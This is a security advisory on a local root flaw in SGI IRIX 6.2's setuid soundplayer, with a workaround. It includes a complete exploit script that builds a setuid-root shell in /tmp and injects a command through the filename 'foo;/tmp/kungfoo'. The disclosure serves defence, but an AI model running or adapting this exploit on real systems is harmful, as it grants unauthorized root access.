SGI's Irix operating system ships with an X11 application called soundplayer, which is used to play .WAV files. It is installed setuid root and is vulnerable to an input validation problem. When saving a file to disk with soundplayer, if a semicolon followed by a command (with no spaces) is appended to the end of the "proper" or "real" filename input, the command will be executed with elevated privileges (the privileges soundplayer runs under). It is possible to compromise root access locally through exploitation of this vulnerability. It is confirmed that at least Irix 6.2 is vulnerable.
Credit:
The information was provided by: Loneguard.
Vulnerable systems:
SGI IRIX 6.2
Exploit:
#!/bin/sh
#
# Irix 6.x soundplayer xploit - Loneguard 20/02/99
#
# Good example of how bad coding in a non-setuid/privileged process
# can offer up rewt
#
# Build a small setuid helper that soundplayer will run for us.
cat > /tmp/crazymonkey.c << 'EOF'
#include <stdlib.h>
#include <unistd.h>
int main(void) {
setuid(0);
system("cp /bin/csh /tmp/xsh;chmod 4755 /tmp/xsh");
return 0;
}
EOF
# The source was written to /tmp, so compile it from there.
cc -o /tmp/kungfoo /tmp/crazymonkey.c
/usr/sbin/midikeys &
echo "You should now see the midikeys window, goto the menu that allows you to play sounds and load a wav. This will bring
up a soundplayer window. Save the wav as 'foo;/tmp/kungfoo' and go find a rewt shell in tmp"
Temporary workaround:
Remove the setuid root bit from the soundplayer utility.